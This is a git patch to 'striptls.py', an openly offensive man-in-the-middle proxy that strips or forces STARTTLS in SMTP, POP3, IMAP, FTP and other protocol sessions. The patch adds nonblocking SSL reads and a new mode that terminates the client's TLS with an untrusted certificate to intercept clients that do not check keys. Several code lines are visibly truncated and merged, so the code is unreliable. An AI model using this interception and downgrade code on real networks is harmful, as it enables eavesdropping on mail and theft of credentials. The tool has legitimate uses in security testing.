From a68a979ee647a5722151d4bfcaa8864e59a156a8 Mon Sep 17 00:00:00 2001 From: tintinweb Date: Tue, 1 Mar 2016 12:09:52 -0500 Subject: [PATCH] refactor code for nonblocking ssl --- striptls/striptls.py | 103 +++++++++++++++++++++++++++++++++++++------ 1 file changed, 90 insertions(+), 13 deletions(-) diff --git a/striptls/striptls.py b/striptls/striptls.py index 6c46922..29993ad 100644 --- a/striptls/striptls.py +++ b/striptls/striptls.py @@ -40,12 +40,27 @@ def accept(self): return self.socket.accept() def recv(self, buflen=8*1024): + chunks = [] + chunk = True if self.socket_ssl: - self.recvbuf = self.socket_ssl.read(buflen) + data_pending = buflen + while chunk and data_pending: + chunk = self.socket_ssl.read(data_pending) + chunks.append(chunk) + data_pending = self.socket_ssl.pending() else: - self.recvbuf = self.socket.recv(buflen) + chunks.append(self.socket.recv(buflen)) + self.recvbuf = ''.join(chunks) return self.recvbuf + def recv_blocked(self, buflen=8*1024, timeout=None): + end = time.time()+timeout if timeout else 0 + while not timeout or time.time()=1: @@ -77,6 +93,7 @@ def ssl_wrap_socket_with_context(self, ctx, *args, **kwargs): if not args and not kwargs.get('sock'): kwargs['sock'] = self.socket self.socket_ssl = ctx.wrap_socket(*args, **kwargs) + self.socket_ssl.setblocking(0) # nonblocking for select class ProtocolDetect(object): PROTO_SMTP = 25 @@ -149,6 +166,7 @@ def __init__(self, proxy, inbound=None, outbound=None, target=None, buffer_size= self.outbound = TcpSockBuff(outbound, peer=target) self.buffer_size = buffer_size self.protocol = ProtocolDetect(target=target) + self.datastore = {} def __repr__(self): return " [prxy: %s] --> [target: %s]>"%(hex(id(self)), @@ -241,7 +259,7 @@ def set_callback(self, name, f): def main_loop(self): self.input_list.add(self.inbound) while True: - time.sleep(self.delay) + #time.sleep(self.delay) inputready, _, _ = select.select(self.input_list, [], []) for sock in inputready: @@ -261,6 +279,10 @@ def main_loop(self): try: session = self.get_session_by_client_sock(sock) session.notify_read(sock) + except ssl.SSLError, se: + if se.errno != ssl.SSL_ERROR_WANT_READ: + raise + continue except SessionTerminatedException: self.input_list.difference_update(session.get_peer_sockets()) logger.warning("%s terminated."%session) @@ -393,7 +415,7 @@ def mangle_client_data(session, data, rewrite): session.outbound.sendall(data) logging.debug("%s [client] => [server] %s"%(session,repr(data))) - resp_data = session.outbound.recv() + resp_data = session.outbound.recv_blocked() logging.debug("%s <= [server] %s"%(session,repr(resp_data))) if "220" not in resp_data: raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data)) @@ -405,7 +427,62 @@ def mangle_client_data(session, data, rewrite): elif "mail from" in data.lower(): rewrite.set_result(session, True) return data - + + class InboundStarttlsProxy: + ''' Inbound is starttls, outbound is plain + 1) Do not mangle server data + 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted. + in case client does not check keys + ''' + @staticmethod + def mangle_server_data(session, data, rewrite): + # keep track of stripped server ehlo/helo + if any(e in session.outbound.sndbuf.lower() for e in ('ehlo','helo')) and "250" in data and not session.datastore.get("server_ehlo_stripped"): #only do this once + # wait for full line + while not "250 " in data: + data+=session.outbound.recv_blocked() + + features = [f for f in data.strip().split('\r\n') if not "STARTTLS" in f] + if features and not features[-1].startswith("250 "): + features[-1] = features[-1].replace("250-","250 ") # end marker + # force starttls announcement + session.datastore['server_ehlo_stripped']= '\r\n'.join(features)+'\r\n' # stripped + + if len(features)>1: + features.insert(-1,"250-STARTTLS") + else: + features.append("250 STARTTLS") + features[0]=features[0].replace("250 ","250-") + data = '\r\n'.join(features)+'\r\n' # forced starttls + session.datastore['server_ehlo'] = data + + return data + @staticmethod + def mangle_client_data(session, data, rewrite): + if "STARTTLS" in data: + # do inbound STARTTLS + session.inbound.sendall("220 Go ahead\r\n") + logging.debug("%s [client] <= [ ][mangled] %s"%(session,repr("220 Go ahead\r\n"))) + context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH) + context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, + keyfile=Vectors._TLS_KEYFILE) + session.inbound.ssl_wrap_socket_with_context(context, server_side=True) + logging.debug("%s [client] <= [ ][mangled] waiting for inbound SSL Handshake"%(session)) + # inbound ssl, fake server ehlo on helo/ehlo + indata = session.inbound.recv_blocked() + if not any(e in indata for e in ('ehlo','helo')): + raise ProtocolViolationException("whoop!? client did not send EHLO/HELO after STARTTLS finished.. proto violation: %s"%repr(indata)) + logging.debug("%s [client] => [mangled] %s"%(session,repr(indata))) + session.inbound.sendall(session.datastore["server_ehlo_stripped"]) + logging.debug("%s [client] <= [mangled] %s"%(session,repr(session.datastore["server_ehlo_stripped"]))) + data=None + elif any(e in data for e in ('ehlo','helo')) and session.datastore.get("server_ehlo_stripped"): + # just do not forward the second ehlo/helo + data=None + elif "mail from" in data.lower(): + rewrite.set_result(session, True) + return data + class ProtocolDowngradeStripExtendedMode: ''' Return error on EHLO to force peer to non-extended mode ''' @@ -503,7 +580,7 @@ def mangle_client_data(session, data, rewrite): session.outbound.sendall(data) logging.debug("%s [client] => [server] %s"%(session,repr(data))) - resp_data = session.outbound.recv() + resp_data = session.outbound.recv_blocked() logging.debug("%s <= [server] %s"%(session,repr(resp_data))) if "+OK" not in resp_data: raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data)) @@ -577,7 +654,7 @@ def mangle_client_data(session, data, rewrite): session.outbound.sendall(data) logging.debug("%s [client] => [server] %s"%(session,repr(data))) - resp_data = session.outbound.recv() + resp_data = session.outbound.recv_blocked() logging.debug("%s <= [server] %s"%(session,repr(resp_data))) if "%s OK"%id not in resp_data: raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data)) @@ -650,7 +727,7 @@ def mangle_client_data(session, data, rewrite): session.outbound.sendall(data) logging.debug("%s [client] => [server] %s"%(session,repr(data))) - resp_data = session.outbound.recv() + resp_data = session.outbound.recv_blocked() logging.debug("%s <= [server] %s"%(session,repr(resp_data))) if not resp_data.startswith("234"): raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data)) @@ -723,7 +800,7 @@ def mangle_client_data(session, data, rewrite): session.outbound.sendall(data) logging.debug("%s [client] => [server] %s"%(session,repr(data))) - resp_data = session.outbound.recv() + resp_data = session.outbound.recv_blocked() logging.debug("%s <= [server] %s"%(session,repr(resp_data))) if not resp_data.startswith("382"): raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data)) @@ -776,7 +853,7 @@ def mangle_server_data(session, data, rewrite): # do outbound starttls as required by server session.outbound.sendall("") logging.debug("%s [client] => [server][mangled] %s"%(session,repr(""))) - resp_data = session.outbound.recv() + resp_data = session.outbound.recv_blocked() if not resp_data.startswith(" [server] %s"%(session,repr(data))) - resp_data = session.outbound.recv() + resp_data = session.outbound.recv_blocked() logging.debug("%s <= [server] %s"%(session,repr(resp_data))) if not resp_data.startswith(" [server] %s"%(session,repr(data))) - resp_data = session.outbound.recv() + resp_data = session.outbound.recv_blocked() logging.debug("%s <= [server] %s"%(session,repr(resp_data))) if not " OK " in resp_data: raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data)) @@ -1098,7 +1175,7 @@ def mangle_client_data(session, data, rewrite): session.outbound.sendall(data) logging.debug("%s [client] => [server] %s"%(session,repr(data))) - resp_data = session.outbound.recv() + resp_data = session.outbound.recv_blocked() logging.debug("%s <= [server] %s"%(session,repr(resp_data))) if not " 670 " in resp_data: raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))